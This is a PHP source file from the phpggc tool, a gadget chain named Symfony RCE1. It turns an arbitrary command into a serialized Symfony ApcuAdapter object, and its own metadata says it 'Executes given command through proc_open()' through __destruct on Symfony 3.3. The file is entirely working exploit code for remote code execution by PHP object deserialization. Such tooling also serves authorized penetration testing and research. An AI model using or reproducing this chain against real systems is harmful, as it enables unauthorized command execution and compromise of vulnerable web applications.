Codebase list phpggc / 1b629bdd-61f0-410d-87cb-00f49cf14044/upstream gadgetchains / Symfony / RCE / 1 / chain.php
1b629bdd-61f0-410d-87cb-00f49cf14044/upstream

Tree @1b629bdd-61f0-410d-87cb-00f49cf14044/upstream (Download .tar.gz)

chain.php @1b629bdd-61f0-410d-87cb-00f49cf14044/upstreamraw · history · blame

<?php

namespace GadgetChain\Symfony;

class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
{
    public static $version = '3.3';
    public static $vector = '__destruct';
    public static $author = 'cf';
    public static $information = 'Executes given command through proc_open()';

    public function generate(array $parameters)
    {
        $command = $parameters['command'];

        return new \Symfony\Component\Cache\Adapter\ApcuAdapter(
        	$command
        );
    }
}